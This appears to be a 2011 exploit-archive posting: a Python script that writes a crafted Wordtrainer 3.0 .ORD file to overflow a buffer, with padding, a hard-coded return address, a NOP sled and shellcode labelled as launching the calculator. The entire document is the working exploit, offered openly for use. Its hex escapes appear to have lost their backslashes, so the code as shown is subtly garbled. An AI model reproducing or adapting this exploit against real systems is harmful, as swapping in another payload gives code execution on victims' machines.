Wordtrainer 3.0 Buffer Overflow
Posted on 12 April 2011
#!/usr/bin/python # #[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability #[+]Date: 12 42011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe #[+]Version: 3.0 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # from struct import pack from time import sleep print """ Exploit Buffer Overflow Wordtrainer 3.0 Created BY C4SS!0 G0M3S E-mail Louredo_@hotmail.com Site www.exploit-br.org """ buf = ("x41" * 868) buf += pack('<L',0x00430363) buf += ("x90" * 10) buf += ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" #Shellcode WinExec("calc",0) "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" "x7fxe8x7bxca") buf += "x41" * (2000-len(buf)) head = ("x47x4Cx4Fx53x4Fx52x0Dx0Ax31x0Dx0Ax0Dx0Ax20x0Dx0A") head += (buf+" ") print "[+]Creating the Exploit File..." sleep(1) FILE = open("Exploit.ord","wb") FILE.write(head) FILE.close() print "[+]File Created With Success " sleep(2)
